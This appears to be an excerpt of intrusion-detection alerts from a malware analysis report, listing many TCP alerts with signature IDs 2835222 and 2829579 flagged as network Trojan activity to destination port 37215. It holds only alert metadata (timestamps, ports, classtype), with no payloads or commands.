          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739450
          SID:2835222
          Source Port:54934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357046
          SID:2835222
          Source Port:45046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550560
          SID:2835222
          Source Port:46766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800672
          SID:2835222
          Source Port:40366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083840
          SID:2829579
          Source Port:41844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150915
          SID:2835222
          Source Port:49512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480906
          SID:2835222
          Source Port:40032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484766
          SID:2835222
          Source Port:48858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664390
          SID:2829579
          Source Port:35812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061240
          SID:2829579
          Source Port:42266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.225418
          SID:2829579
          Source Port:41822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728962
          SID:2835222
          Source Port:59268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537459
          SID:2829579
          Source Port:49500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.683216
          SID:2829579
          Source Port:58246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195921
          SID:2829579
          Source Port:58464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486262
          SID:2835222
          Source Port:57406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742324
          SID:2829579
          Source Port:43270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208067
          SID:2829579
          Source Port:43464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239951
          SID:2829579
          Source Port:41676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807132
          SID:2835222
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278295
          SID:2829579
          Source Port:38976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230215
          SID:2835222
          Source Port:38590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033020
          SID:2829579
          Source Port:35414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551237
          SID:2829579
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712258
          SID:2835222
          Source Port:60990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680711
          SID:2829579
          Source Port:46110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979639
          SID:2835222
          Source Port:53138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102987
          SID:2829579
          Source Port:58250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178047
          SID:2829579
          Source Port:46602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290588
          SID:2829579
          Source Port:35734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803770
          SID:2835222
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949108
          SID:2835222
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.715842
          SID:2835222
          Source Port:46282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337447
          SID:2829579
          Source Port:34454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183402
          SID:2829579
          Source Port:40448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847642
          SID:2829579
          Source Port:48448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592885
          SID:2829579
          Source Port:45844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267384
          SID:2835222
          Source Port:45290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272285
          SID:2829579
          Source Port:47894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273298
          SID:2829579
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330079
          SID:2835222
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113030
          SID:2835222
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338020
          SID:2829579
          Source Port:57148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770409
          SID:2829579
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985162
          SID:2835222
          Source Port:41220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914275
          SID:2829579
          Source Port:54312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962431
          SID:2835222
          Source Port:46668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144857
          SID:2829579
          Source Port:49962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206747
          SID:2835222
          Source Port:57324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816572
          SID:2835222
          Source Port:49428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.009924
          SID:2835222
          Source Port:59488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223561
          SID:2829579
          Source Port:43720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847523
          SID:2829579
          Source Port:52404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209357
          SID:2835222
          Source Port:35958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483917
          SID:2829579
          Source Port:55724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938468
          SID:2835222
          Source Port:38274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151170
          SID:2835222
          Source Port:32950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.545888
          SID:2829579
          Source Port:33088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.177370
          SID:2835222
          Source Port:44552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528217
          SID:2829579
          Source Port:60904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689684
          SID:2835222
          Source Port:35450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794398
          SID:2835222
          Source Port:43422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760117
          SID:2829579
          Source Port:42764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237138
          SID:2829579
          Source Port:33460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202189
          SID:2829579
          Source Port:57580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201835
          SID:2835222
          Source Port:52324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922893
          SID:2829579
          Source Port:42156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924086
          SID:2835222
          Source Port:44972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590709
          SID:2835222
          Source Port:58950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842028
          SID:2835222
          Source Port:48288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537201
          SID:2829579
          Source Port:50776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473358
          SID:2835222
          Source Port:59558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.823173
          SID:2835222
          Source Port:44710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536685
          SID:2835222
          Source Port:57846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473493
          SID:2835222
          Source Port:60480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914440
          SID:2835222
          Source Port:40716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964839
          SID:2835222
          Source Port:60218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138142
          SID:2829579
          Source Port:56760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.316439
          SID:2835222
          Source Port:46414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893301
          SID:2835222
          Source Port:60130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285199
          SID:2835222
          Source Port:36024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659812
          SID:2835222
          Source Port:59566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271662
          SID:2829579
          Source Port:34092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555041
          SID:2835222
          Source Port:46850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329604
          SID:2835222
          Source Port:40014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465117
          SID:2829579
          Source Port:38994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807654
          SID:2835222
          Source Port:40936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212657
          SID:2829579
          Source Port:35954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.690352
          SID:2829579
          Source Port:46250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215545
          SID:2829579
          Source Port:36526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213420
          SID:2835222
          Source Port:45312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131732
          SID:2835222
          Source Port:40228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.694298
          SID:2835222
          Source Port:54848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756294
          SID:2835222
          Source Port:59372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332715
          SID:2835222
          Source Port:42016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114097
          SID:2835222
          Source Port:55336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943970
          SID:2829579
          Source Port:48046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.683091
          SID:2835222
          Source Port:60740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181252
          SID:2829579
          Source Port:45630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145254
          SID:2829579
          Source Port:36930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722002
          SID:2835222
          Source Port:35270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102958
          SID:2835222
          Source Port:55990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177212
          SID:2835222
          Source Port:55792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039337
          SID:2835222
          Source Port:44758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867528
          SID:2829579
          Source Port:41884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334224
          SID:2835222
          Source Port:44756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236577
          SID:2829579
          Source Port:49526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.073943
          SID:2829579
          Source Port:40492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178037
          SID:2835222
          Source Port:57268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114245
          SID:2835222
          Source Port:50144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806674
          SID:2829579
          Source Port:54328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160844
          SID:2835222
          Source Port:52000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535685
          SID:2835222
          Source Port:47548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722332
          SID:2835222
          Source Port:52518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209028
          SID:2835222
          Source Port:42602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.087352
          SID:2835222
          Source Port:55738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548029
          SID:2835222
          Source Port:58610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159294
          SID:2829579
          Source Port:44960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211550
          SID:2829579
          Source Port:45920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730802
          SID:2835222
          Source Port:38212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978778
          SID:2835222
          Source Port:34492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614160
          SID:2835222
          Source Port:60180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857746
          SID:2829579
          Source Port:53896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797907
          SID:2829579
          Source Port:51570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135924
          SID:2829579
          Source Port:53188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272833
          SID:2829579
          Source Port:54198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325784
          SID:2835222
          Source Port:45538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711119
          SID:2829579
          Source Port:45408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299387
          SID:2835222
          Source Port:37554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147671
          SID:2835222
          Source Port:41420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247826
          SID:2835222
          Source Port:49048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464381
          SID:2829579
          Source Port:57554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322002
          SID:2829579
          Source Port:39722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846361
          SID:2829579
          Source Port:45502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840430
          SID:2835222
          Source Port:36058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295117
          SID:2835222
          Source Port:50292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290232
          SID:2835222
          Source Port:46482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214694
          SID:2829579
          Source Port:54100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939663
          SID:2829579
          Source Port:42644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044300
          SID:2829579
          Source Port:42538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160925
          SID:2835222
          Source Port:48822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782916
          SID:2829579
          Source Port:37722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861492
          SID:2835222
          Source Port:46690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593037
          SID:2829579
          Source Port:47690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914774
          SID:2835222
          Source Port:49534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631805
          SID:2835222
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797182
          SID:2835222
          Source Port:51294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710105
          SID:2835222
          Source Port:37990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711490
          SID:2829579
          Source Port:58640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868082
          SID:2835222
          Source Port:46694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241974
          SID:2835222
          Source Port:52390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988993
          SID:2829579
          Source Port:42706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236876
          SID:2835222
          Source Port:58516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511308
          SID:2835222
          Source Port:52888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207054
          SID:2829579
          Source Port:46898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168401
          SID:2829579
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475889
          SID:2835222
          Source Port:39352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513737
          SID:2829579
          Source Port:57534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.189026
          SID:2829579
          Source Port:38792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530352
          SID:2829579
          Source Port:34932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588855
          SID:2835222
          Source Port:35894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268854
          SID:2829579
          Source Port:52040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463012
          SID:2829579
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722014
          SID:2829579
          Source Port:41724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486506
          SID:2835222
          Source Port:37594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793559
          SID:2835222
          Source Port:39680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483664
          SID:2835222
          Source Port:40254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068449
          SID:2835222
          Source Port:43432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021644
          SID:2835222
          Source Port:60496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212669
          SID:2829579
          Source Port:43556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794755
          SID:2829579
          Source Port:54772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328513
          SID:2835222
          Source Port:39646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840719
          SID:2835222
          Source Port:42604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401245
          SID:2835222
          Source Port:57214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560531
          SID:2835222
          Source Port:45902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154334
          SID:2829579
          Source Port:52106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.324894
          SID:2835222
          Source Port:47994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.094010
          SID:2835222
          Source Port:48520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.566513
          SID:2829579
          Source Port:41818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472778
          SID:2835222
          Source Port:52856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232829
          SID:2829579
          Source Port:57094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978405
          SID:2835222
          Source Port:54922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734788
          SID:2829579
          Source Port:38030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755967
          SID:2829579
          Source Port:38740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.482832
          SID:2829579
          Source Port:36394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727194
          SID:2835222
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281301
          SID:2835222
          Source Port:51092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543487
          SID:2829579
          Source Port:39494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841431
          SID:2829579
          Source Port:41286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922871
          SID:2835222
          Source Port:40394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425082
          SID:2829579
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962711
          SID:2829579
          Source Port:37416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488731
          SID:2829579
          Source Port:44058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550520
          SID:2829579
          Source Port:33480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593091
          SID:2829579
          Source Port:37694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271471
          SID:2829579
          Source Port:33806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297607
          SID:2835222
          Source Port:56340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
